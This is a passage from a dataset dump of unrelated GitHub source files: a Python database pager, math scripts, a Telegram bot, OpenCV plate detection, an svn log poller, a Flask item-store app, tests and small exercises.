the file ptr location to the end of the file\n try:\n # file exists\n self.fileptr = open(self.filename, \"r+b\")\n self.read_file_header()\n except FileNotFoundError:\n # file does not exist\n self.fileptr = open(self.filename, \"w+b\")\n self.create_file_header()\n self.file_length = os.path.getsize(self.filename)\n\n # get exclusive lock on file or fail\n # multiple programs may have opened the database file, but only one will get exclusive\n # lock, while the others will get killed and cleaned up\n\n # NOTE: this wont' work on windows\n ex_lock_or_fail = fcntl.LOCK_EX | fcntl.LOCK_NB\n try:\n fcntl.lockf(self.fileptr, ex_lock_or_fail)\n except BlockingIOError:\n self.fileptr.close()\n raise DatabaseFileExclusiveLockNotAvailable(\n \"Another process is operating on database\"\n )\n\n if (\n self.file_length % PAGE_SIZE != 0\n and (self.file_length - FILE_HEADER_SIZE) % PAGE_SIZE != 0\n ):\n logging.error(\"Db file is not a valid size. Corrupt file.\")\n sys.exit(EXIT_FAILURE)\n\n self.num_pages = (\n (self.file_length - FILE_HEADER_SIZE) // PAGE_SIZE\n if self.file_length != 0\n else 0\n )\n self.num_pages_on_disk = self.num_pages\n # next free page is the last page of the file\n self.next_allocatable_page_num = self.num_pages\n\n # warm up page cache, i.e. load pages into memory\n # to load data, seek to beginning of file\n self.fileptr.seek(FILE_HEADER_SIZE)\n for page_num in range(self.num_pages):\n self.get_page(page_num)\n\n def create_file_header(self):\n \"\"\"\n generate file header\n :return:\n \"\"\"\n header = bytearray(FILE_HEADER_SIZE)\n assert FILE_HEADER_VERSION_FIELD_SIZE >= len(FILE_HEADER_VERSION_VALUE)\n # set version field\n header[\n FILE_HEADER_VERSION_FIELD_OFFSET : FILE_HEADER_VERSION_FIELD_OFFSET\n + FILE_HEADER_VERSION_FIELD_SIZE\n ] = FILE_HEADER_VERSION_VALUE\n\n # initialize free page head to null\n # NOTE: these are strictly not needed, since a new page would be all zeroes,\n # and the null and false are both encoded as 0.\n # However, this makes explicit what file init should look like, and is robust\n # to scenarios where the above assumptions dont hold.\n value = NULLPTR.to_bytes(FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n value = False.to_bytes(FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET, sys.byteorder)\n header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ] = value\n\n self.header = header\n\n def read_file_header(self):\n \"\"\"\n read the file header, formatted like:\n\n version_string next_free_page has_free_list padding\n version_string -> \"learndb v\"\n next_free_page -> int, next page_num\n has_free_list -> bool, free_page_list\n\n :return:\n \"\"\"\n # read header\n self.fileptr.seek(0)\n self.header = bytearray(self.fileptr.read(FILE_HEADER_SIZE))\n # free page list is set\n has_free_page_list_bytes = self.header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ]\n has_free_page_list = bool.from_bytes(has_free_page_list_bytes, sys.byteorder)\n self.has_free_page_list = has_free_page_list\n # get free list head ptr\n next_free_page_bytes = self.header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n next_free_page = int.from_bytes(next_free_page_bytes, sys.byteorder)\n self.free_page_list_head = next_free_page\n\n @staticmethod\n def get_free_page_next(page: bytes) -> Tuple[bool, int]:\n \"\"\"\n read tuple [has_next, next free page]\n :param page:\n :return: (has_next_free_page, next_free_page_num)\n \"\"\"\n has_next_free_page_bytes = page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n has_next_free_page = bool.from_bytes(has_next_free_page_bytes, sys.byteorder)\n next_page_num = 0\n if has_next_free_page:\n value = page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ]\n next_page_num = int.from_bytes(value, sys.byteorder)\n return has_next_free_page, next_page_num\n\n @staticmethod\n def set_free_page_next(page: bytearray, next_page_num: int):\n \"\"\"\n set next ptr on page\n :param page:\n :param next_page_num:\n :return:\n \"\"\"\n value = True.to_bytes(FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n value = next_page_num.to_bytes(\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder\n )\n page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n @staticmethod\n def set_free_page_next_null(page: bytearray):\n \"\"\"\n set next ptr null on free page\n \"\"\"\n\n value = False.to_bytes(FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n page[\n FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_HAS_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n value = NULLPTR.to_bytes(FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder)\n page[\n FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET : FREE_PAGE_NEXT_FREE_PAGE_HEAD_OFFSET\n + FREE_PAGE_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n @staticmethod\n def set_free_page_head(header: bytearray, next_page_num: int):\n value = True.to_bytes(FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE, sys.byteorder)\n header[\n FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET : FILE_HEADER_HAS_FREE_PAGE_LIST_OFFSET\n + FILE_HEADER_HAS_FREE_PAGE_LIST_SIZE\n ] = value\n value = next_page_num.to_bytes(\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE, sys.byteorder\n )\n header[\n FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET : FILE_HEADER_NEXT_FREE_PAGE_HEAD_OFFSET\n + FILE_HEADER_NEXT_FREE_PAGE_HEAD_SIZE\n ] = value\n\n def flush_header(self):\n \"\"\"\n Flush file header\n :return:\n \"\"\"\n byte_offset = FILE_HEADER_OFFSET\n self.fileptr.seek(byte_offset)\n to_write = self.header\n self.fileptr.write(to_write)\n\n def flush_page(self, page_num: int):\n \"\"\"\n flush/write page to file\n page_num is the page to write\n size is the number of bytes to write\n \"\"\"\n if self.pages[page_num] is None:\n logging.error(\"Tried to flush null page\")\n sys.exit(EXIT_FAILURE)\n\n byte_offset = FILE_PAGE_AREA_OFFSET + page_num * PAGE_SIZE\n self.fileptr.seek(byte_offset)\n to_write = self.pages[page_num]\n self.fileptr.write(to_write)\n","repo_name":"spandanb/learndb-py","sub_path":"learndb/pager.py","file_name":"pager.py","file_ext":"py","file_size_in_byte":16976,"program_lang":"python","lang":"en","doc_type":"code","stars":1145,"dataset":"github-code","pt":"6"} +{"seq_id":"17651843317","text":"# periods of nth coefficient of Chebyshev polynomials in Zp\n\n# return all nth coefficients in Zp in first 5000 polynomials\ndef nth_coeff(n, co_eff_lst, p):\n if n == 1: start = 1\n else: start = 2*n - 3\n\n nth_coeff_lst = [co_eff_lst[i][n-1] for i in range(start, 1000)]\n return [i % p for i in nth_coeff_lst]\n\n# select the xth value in the nth coefficient list\ndef f(x, nth_coeff_lst):\n return nth_coeff_lst[x]\n\n# period length function (improve repetition for more reliable dara)\ndef findperiod(nth_coeff_lst, minlength=2, repetitions=3):\n while minlength <= 1500:\n cur_lst = [f(i, nth_coeff_lst) for i in range(minlength)]\n for rep in range(1, repetitions):\n lst = [f(i,nth_coeff_lst) for i in range(minlength*rep,minlength*(rep+1))]\n if cur_lst != lst:\n minlength += 1\n break\n else: return minlength","repo_name":"6taco-cat9/chebyshev_polynomials","sub_path":"coefficiant_period.py","file_name":"coefficiant_period.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10711592274","text":"\ndef intro(chat_id,message_id,bot):\n img=\"https://raw.githubusercontent.com/AkkuPY/Sara-Bot/main/Assets/Sara_Bot.jpg\"\n a='''Heyy I'm Sara, Created By AkkuPY @Akku_Legend \nType in /notes to know my True Potential!!!'''\n bot.sendChatAction(chat_id=chat_id, action=\"typing\")\n bot.sendPhoto(chat_id=chat_id, photo=img, caption=a,reply_to_message_id = message_id)\n\n\n\ndef note(chat_id,message_id,bot):\n b='''Here Are The List Of Features Currently I Have.\nType in / To get the desired result.\n \n->wiki : Search The Wikipedia About Anything\n->yt_music : YT Mp3 Music Converter\n\nMore Are On the way! \nAdmin:@Akku_Legend '''\n bot.sendChatAction(chat_id=chat_id, action=\"typing\")\n bot.sendMessage(chat_id=chat_id, text=b, reply_to_message_id=message_id)\n","repo_name":"akkupy/Sara-Bot","sub_path":"Modules/Intro_Notes.py","file_name":"Intro_Notes.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"5298750068","text":"import cv2\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport imutils\n\n#read the image\nimg = cv2.imread(r\"G:\\Open Cv\\Car Number Plate Detection\\image1.jpg\") # BGR\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) #coverted into gray to easily can remove the noise\nplt.figure(figsize=(15,15))\n# plt.imshow(gray,cmap='gray')\n# plt.show()\n\n\n#apply filter to remove the noise in the image\naply_filter = cv2.bilateralFilter(gray,11,17,17)\n\n#edge detection\nedg_det = cv2.Canny(aply_filter,30,200)\n# plt.imshow(edg_det,cmap=\"gray\")\n# plt.show()\n\n\n#find the countours in the image\nkeypoints = cv2.findContours(edg_det.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\n\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n\nlocation = []\nfor contour in contours:\n approx = cv2.approxPolyDP(contour, 10, True)\n if len(approx) == 4:\n location = approx\n break\n\n\nmask = np.zeros(gray.shape, np.uint8)\nnew_image = cv2.drawContours(mask, [location], 0,255, -1)\nnew_image = cv2.bitwise_and(img, img, mask=mask)\n\n# plt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))\n# plt.show()\n\n\n(x,y) = np.where(mask==255)\n(x1, y1) = (np.min(x), np.min(y))\n(x2, y2) = (np.max(x), np.max(y))\ncropped_image = gray[x1:x2+1, y1:y2+1]\n\nplt.imshow(cropped_image,cmap=\"gray\")\nplt.show()\n\n\n\n\n","repo_name":"CHIRU98/CarNumPlate","sub_path":"number_plate_detection.py","file_name":"number_plate_detection.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"19286954507","text":"from typing import Any\r\n\r\n\r\ndef form(value: Any) -> str:\r\n if isinstance(value, dict):\r\n return \"[complex value]\"\r\n elif isinstance(value, bool):\r\n return str(value).lower()\r\n elif value is None:\r\n return 'null'\r\n elif isinstance(value, int):\r\n return str(value)\r\n return f\"'{str(value)}'\"\r\n\r\n\r\ndef get_child(item: Any) -> Any:\r\n if isinstance(item, dict):\r\n return item[\"children\"]\r\n return item\r\n\r\n\r\ndef to_plain(data: dict, path: str = \"\") -> str:\r\n plain_data = []\r\n data = get_child(data)\r\n for item in data:\r\n new_path = path + str(item[\"key\"])\r\n status = item[\"status\"]\r\n if status == \"added\":\r\n plain_data.append(f\"Property '{new_path}' was added with \"\r\n f\"value: {form(value=item['new'])}\")\r\n elif status == \"delete\":\r\n plain_data.append(f\"Property '{new_path}' was removed\")\r\n elif status == \"changed\":\r\n plain_data.append(f\"Property '{new_path}' was updated. \"\r\n f\"From {form(value=item['old'])} \"\r\n f\"to {form(value=item['new'])}\")\r\n elif status == \"nested\":\r\n plain_data.append(to_plain(get_child(item), path=f\"{new_path}.\"))\r\n\r\n return \"\\n\".join(plain_data)\r\n","repo_name":"Madixxx22/python-project-50","sub_path":"gendiff/formatter/plain.py","file_name":"plain.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"45626533406","text":"import json\n\nopening_braces = ['[', '{', '\"']\nclosing_braces = [']', '}', '\"']\ncommon_braces = ['\"']\nopen_to_close = { k: v for k, v in zip(opening_braces, closing_braces)}\nclose_to_open = { k: v for k, v in zip(closing_braces, opening_braces)}\n\n# jsonの部分文字列を受け取って、閉じられたjson文字列を返す\n# 例: close_partial_json('{\"foo\": [\"bar\", \"baz\"]') == '{\"foo\": [\"bar\", \"baz\"]}'\n# Mapのキーの途中で終了している場合は、正常なJSONを返さない\ndef close_partial_json(partial_json):\n stack = []\n for char in partial_json:\n if char in common_braces:\n if stack and stack[-1] == char:\n stack.pop()\n else:\n stack.append(char)\n elif stack and stack[-1] in common_braces:\n continue\n elif char in opening_braces:\n stack.append(char)\n elif char in closing_braces:\n if stack[-1] == close_to_open[char]:\n stack.pop()\n else:\n raise ValueError(\"Invalid JSON: missing opening brace for \" + char)\n closed_json = partial_json\n for unclosed_brace in reversed(stack):\n closed_json += open_to_close[unclosed_brace]\n\n return closed_json\n\n\n# jsonの部分文字列を受け取って、parseする。\n# Mapのキーの途中で終了している場合は、Noneを返す\ndef force_parse_json(partial_json, report_error=False, clean_up=True):\n closed_json = close_partial_json(partial_json)\n try:\n response = json.loads(closed_json)\n return clean_up_dict(response) if clean_up else response\n except Exception as e:\n if report_error:\n print(e)\n return None\n \n# Remove empty array and empty value from dict\ndef clean_up_dict(obj):\n if isinstance(obj, dict):\n o = {k: clean_up_dict(v) for k, v in obj.items()}\n o = {k: v for k, v in o.items() if v}\n return o if len(o) > 0 else None\n elif isinstance(obj, list):\n l = [clean_up_dict(v) for v in obj]\n l = [v for v in l if v]\n return l if len(l) > 0 else None\n else:\n return obj","repo_name":"furnqse/gpt-stream-json-parser","sub_path":"gpt_stream_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"4004545386","text":"import numpy as np\n\nfrom util import *\n\nclass ArmVolume:\n def __init__(self, arm, res=100, offset=90, backSize=500):\n self.offset = offset\n self.res = res\n self.samples = np.ndarray(shape=(res,res), dtype=bool)\n self.size = (430-offset, backSize)\n\n self.y_step = self.size[1]/float(res)\n self.x_step = self.size[0]/float(res)\n for y in xrange(res):\n for x in xrange(res):\n pos = [0, (y-res/2)*self.y_step, offset + x*self.x_step]\n self.samples[x,y] = self.trueValid(arm, pos)\n\n def getRadii(self, height):\n y_ind = np.clip(int(height/self.y_step + self.res/2), 0, self.res-1)\n\n min = 0\n max = None\n for x in xrange(self.res):\n if max is None:\n if not self.samples[x, y_ind]:\n min = self.offset + x*self.x_step\n if self.samples[x, y_ind]:\n max = self.offset + x*self.x_step\n\n return min,max\n\n def isValid(self, point):\n \"\"\"Whether or not a potential end-effector position is likely to be\n valid. Point must be 2D (in IK plane)\n \"\"\"\n x = int((point[0]-self.offset)/self.x_step)\n y = int(point[1]/self.y_step)\n return self.samples[x, y]\n\n def trueValid(self, arm, point):\n arm.setWristGoalPosition(point)\n if arm.ik.valid:\n pose = arm.getIKPose()\n if pose is not None:\n test = pose.checkClearance()\n else:\n test = False\n else:\n test = False\n return test\n\n\n def projectValid(self, arm, point):\n \"\"\"Projects an invalid point to a valid one\"\"\"\n point = np.array(point)\n # 3D projection target point in plane\n td = normalize([point[0], point[2]])*300\n proj = np.array([td[0], 0, td[1]])\n point += (proj - point)*0.005\n\n iters = 0\n while not self.trueValid(arm, point) and iters < 1000:\n point += (proj - point)*0.005\n iters += 1\n return point\n","repo_name":"AliShug/EvoArm","sub_path":"PyIK/src/armvolume.py","file_name":"armvolume.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"6"} +{"seq_id":"42229690175","text":"# -*- coding: utf-8 -*-\r\n\r\n__all__ = ['POPEN_KW', 'Log', 'get_logs', 'get_log', 'get_revisions']\r\n\r\n\r\nimport os, sys, subprocess\r\nfrom compat import xml2elem, strptime\r\nfrom decoder import safe_decode\r\n\r\nPOPEN_ENV = os.environ.copy()\r\nPOPEN_ENV['LANG'] = 'C'\r\n\r\nPOPEN_KW = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=POPEN_ENV)\r\n\r\n\r\nclass Log(object):\r\n def __init__(self, url, rev):\r\n self.url = url\r\n self.rev = rev\r\n\r\n xml_data = self._prepare_info(self.url, self.rev)\r\n root = xml2elem(xml_data)\r\n entry = root.find('entry')\r\n self.url = entry.find('url').text\r\n self.root = entry.find('repository').find('root').text\r\n self.subpath = self.url[len(self.root):]\r\n\r\n xml_data = self._prepare_log(self.url, self.rev)\r\n root = xml2elem(xml_data)\r\n entry = root.find('logentry')\r\n self.author = entry.find('author').text\r\n self.date = strptime(entry.find('date').text[:19],'%Y-%m-%dT%H:%M:%S')\r\n self.msg = entry.find('msg').text\r\n\r\n paths = entry.find('paths')\r\n self.paths = [(x.attrib['action'], x.text) for x in paths]\r\n self.diff = self._process_diff(self.url, self.rev, paths)\r\n\r\n #self.normalized_paths = [\r\n # (a, p[len(self.subpath):].lstrip('/'))\r\n # for a,p in self.paths]\r\n\r\n def _prepare_info(self, url, rev):\r\n '''return `utf-8` xml data'''\r\n cmd = ['svn', 'info', '--xml']\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return out\r\n\r\n def _prepare_log(self, url, rev):\r\n '''return `utf-8` xml data'''\r\n cmd = ['svn', 'log', '-v', '--xml']\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return out\r\n\r\n def _prepare_diff(self, url, rev):\r\n '''return `unicode` text data'''\r\n\r\n cmd = ['svn', 'diff']\r\n try:\r\n rev_i = int(rev)\r\n prev_i = rev_i - 1\r\n cmd.append('-r%d:%d' % (prev_i, rev_i))\r\n except:\r\n cmd.append('-r%s' % rev)\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n return safe_decode(out, per_line=True)\r\n\r\n def _process_diff(self, url, rev, path_set):\r\n need_diff = [x for x in path_set\r\n if not (\r\n x.attrib['action'] == 'D' or\r\n (x.attrib['action'] == 'A' and\r\n 'copyfrom-path' in x.attrib)\r\n )]\r\n\r\n if need_diff:\r\n return self._prepare_diff(url, rev)\r\n\r\n else:\r\n # copy or move or delete only\r\n diffs = []\r\n for path in path_set:\r\n attrib = path.attrib\r\n if attrib['action'] == 'A':\r\n diff = 'Copied: %s\\n from %s (rev %s)' % (\r\n path.text,\r\n attrib['copyfrom-path'],\r\n attrib['copyfrom-rev'],\r\n )\r\n elif attrib['action'] == 'D':\r\n diff = 'Deleted: %s' % path.text\r\n diffs.append(diff)\r\n\r\n return '\\n'.join(diffs)\r\n\r\n def __repr__(self):\r\n return \"\" % (str(self.rev), str(self.url))\r\n\r\n\r\ndef get_logs(url, rev=None, rev2=None):\r\n \"\"\"\r\n >>> url = 'http://svn.example.com/repos/path'\r\n >>> get_logs(url, 1)\r\n []\r\n >>> get_logs(url, 1, 2)\r\n [, ]\r\n >>> get_logs(url, 1, 3)\r\n [, , ]\r\n >>> get_logs(url, 1, 'HEAD')\r\n [, , ..., ]\r\n \"\"\"\r\n cmd = ['svn', 'log', '--xml']\r\n if rev and rev2:\r\n cmd.append('-r%s:%s' % (str(rev), str(rev2)))\r\n elif rev:\r\n cmd.append('-r%s' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n root = xml2elem(out)\r\n return [Log(url, node.attrib['revision']) for node in root]\r\n\r\n\r\ndef get_log(url, rev):\r\n return get_logs(url, rev)[0]\r\n\r\n\r\ndef get_revisions(urls, rev=None):\r\n \"\"\"\r\n >>> urls = ['http://svn.example.com/repos/path1',\r\n ... 'http://svn.example.com/repos/path2']\r\n\r\n No `rev` supplied, get_revisions return all revisions for urls.\r\n\r\n >>> get_revisions(urls)\r\n [1,2,3,5]\r\n\r\n If `rev` supplied, get_revisions collect logs by 'svn -r rev:HEAD',\r\n then returned revisions include `rev` revision.\r\n\r\n >>> get_revisions(urls, 3)\r\n [3,5]\r\n\r\n If `rev` is greater then repository's newest revision, get_revisions\r\n return empty list.\r\n\r\n >>> get_revisions(urls, 6)\r\n []\r\n\r\n Another call samples:\r\n\r\n >>> get_revisions(urls, None)\r\n [1,2,3,5]\r\n >>> get_revisions(urls, 0)\r\n [1,2,3,5]\r\n >>> get_revisions(urls, '0')\r\n [1,2,3,5]\r\n >>> get_revisions(urls, '3')\r\n [3,5]\r\n >>> get_revisions(urls, 5)\r\n [5]\r\n >>> get_revisions(urls, '6')\r\n []\r\n \"\"\"\r\n revs = set()\r\n for url in urls:\r\n cmd = ['svn', 'log', '--xml']\r\n if rev:\r\n cmd.append('-r%s:HEAD' % str(rev))\r\n cmd.append(url)\r\n status, out, err = command(cmd)\r\n if status == 0:\r\n root = xml2elem(out)\r\n revs.update(int(node.attrib['revision']) for node in root)\r\n\r\n return sorted(revs)\r\n\r\ndef command(cmd):\r\n '''command return communication data by `utf-8` '''\r\n #print \"#DEBUG#\", cmd #FIXME: we need --debug option\r\n proc = subprocess.Popen(cmd, **POPEN_KW)\r\n out, err = proc.communicate()\r\n proc.wait()\r\n out = safe_decode(out, per_line=True).encode('utf-8')\r\n return proc.returncode, out, err\r\n\r\n","repo_name":"klaymenr/svnpoller","sub_path":"src/svnpoller/svnlog.py","file_name":"svnlog.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33871739122","text":"from flask import Flask, render_template, request, redirect\r\nfrom db import mydb, mycursor\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef index():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n@app.route('/admin')\r\ndef admin():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('seller.html', items = items)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/additem', methods=['GET', 'POST'])\r\ndef additem():\r\n if request.method == 'GET':\r\n return render_template('post_form.html')\r\n if request.method == 'POST':\r\n _itemname = request.form['itemname']\r\n _price = request.form['price']\r\n _seller = request.form['seller']\r\n sql = 'INSERT INTO itemstable (itmename, price, seller) VALUES (%s, %s, %s)'\r\n val = (_itemname, _price, _seller)\r\n mycursor.execute(sql, val)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n@app.route('/getitems')\r\ndef getitems():\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n\r\n\r\n@app.route('/edit/', methods=['GET', 'POST'])\r\ndef edit_item(id):\r\n if request.method == 'GET':\r\n mycursor.execute(f'SELECT * FROM itemstable WHERE ID={id}')\r\n items = mycursor.fetchone()\r\n return render_template('edit.html', item = items)\r\n if request.method == 'POST':\r\n _itemname = request.form['itemname']\r\n _price = request.form['price']\r\n _seller = request.form['seller']\r\n sql = f'UPDATE itemstable SET itmename = %s, price = %s, seller=%s WHERE ID = %s'\r\n values = (_itemname, _price, _seller, id)\r\n mycursor.execute(sql, values)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n@app.route('/delete/')\r\ndef delete_item(id):\r\n sql = f'DELETE FROM itemstable WHERE ID={id}'\r\n mycursor.execute(sql)\r\n mydb.commit()\r\n mycursor.execute(\"SELECT * FROM itemstable\")\r\n items = mycursor.fetchall()\r\n return render_template('index.html', items = items)\r\n\r\n\r\n\r\n\r\n@app.route('/details/')\r\ndef customer_details(id):\r\n mycursor.execute(f'SELECT * FROM customers WHERE ID={id}')\r\n customer = mycursor.fetchone()\r\n return render_template('customer_detail.html', customer = customer)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()","repo_name":"Godswill121/market","sub_path":"controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17455653614","text":"import os\nimport yaml\n\nfrom brandon.builders.docs import Builder\n\n\ndef test_config_file(tmp_path, app):\n Builder(app=app, output_path=tmp_path).build()\n config_file = os.path.join(tmp_path, f\"{app.exec}-docs\", \"mkdocs.yml\")\n\n with open(config_file) as fp:\n config = yaml.full_load(fp)\n\n assert config[\"site_name\"] == app.name\n assert config[\"theme\"][\"name\"] == \"material\"\n assert config[\"repo_url\"] == app.url\n assert config[\"nav\"] == [\n {\"Home\": \"index.md\"},\n {\n \"Reference\": [\n {\n \"Commands\": [\n {\n \"group1\": [\n {\"comm1\": \"reference/group1/comm1.md\"},\n {\"comm3\": \"reference/group1/comm3.md\"},\n ]\n },\n {\"comm2\": \"reference/comm2.md\"},\n ]\n },\n {\"Schemas\": [{\"Enums\": \"reference/enums.md\"}]},\n ]\n },\n ]\n\n\ndef test_page_creation(tmp_path, app):\n Builder(app=app, output_path=tmp_path).build()\n pages_dir = os.path.join(tmp_path, f\"{app.exec}-docs\", \"docs\")\n ref_pages_dir = os.path.join(pages_dir, \"reference\")\n\n with open(os.path.join(pages_dir, \"index.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# {app.name}\")\n\n with open(os.path.join(ref_pages_dir, \"group1\", \"comm1.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# comm1\")\n\n with open(os.path.join(ref_pages_dir, \"comm2.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# comm2\")\n\n with open(os.path.join(ref_pages_dir, \"enums.md\")) as fp:\n content = fp.read()\n assert content.startswith(f\"# Enums\")\n","repo_name":"wmorellato/brandon","sub_path":"tests/builders/test_docs.py","file_name":"test_docs.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"32161160054","text":"import time\nimport cv2\n\nnum=0\n\n# Initialize the camera\ncap = cv2.VideoCapture(0)\n\n# Set the resolution of the camera\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n\n# Wait for the camera to warm up\ntime.sleep(2)\n\nwhile 1:\n # Capture an image from the camera\n ret, img = cap.read()\n\n img=cv2.rotate(img,cv2.ROTATE_90_CLOCKWISE)\n cv2.imshow('Img',img)\n\n k = cv2.waitKey(2)\n\n if k == ord('q'):\n break\n elif k == ord('s'): # wait for 's' key to save and exit\n cv2.imwrite('images/img' + str(num) + '.png', img)\n print(\"image saved!\")\n num += 1\n\n#close the window\ncv2.destroyAllWindows()\n\n","repo_name":"crowww100/CameraCalibration","sub_path":"getImages.py","file_name":"getImages.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"21211216461","text":"import sys\ninput = sys.stdin.readline\n\nn, min_height = map(int, input().split())\nheights = list(map(int, input().split()))\n\nstart = 0\nend = max(heights)\nresult = 0\nwhile start <= end:\n total = 0\n mid = (start + end) // 2\n\n for t in heights:\n if t - mid > 0:\n total += t - mid\n\n # 절단기의 높이를 늘리면 더 적은 양의 떡이 남고, 낮추면 더 많이 남는다\n # 자른 떡의 양이 min_height이 되지 않는다면 절단기의 높이를 낮춰야 한다 (decrease mid)\n if total < min_height:\n end = mid - 1\n else: # 자른 떡의 양이 min_height과 같거나 그보다 클 때는 절단기의 높이를 늘려야 한다(increase mid)\n result = mid\n start = mid + 1\n\n\n\nprint(total)\n","repo_name":"kimkimj/Algorithm","sub_path":"python/BinarySearch/makingTtekbooki.py","file_name":"makingTtekbooki.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42724249315","text":"from turtle import pos\nimport pygame\nimport sys\nfrom random import randint\nimport numpy as np\n\nfrom ai_architecture import NeuralNetwork, get_input\nfrom read_write import read_last_generation\n\nclass Snake():\n \n def __event_handler(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP or 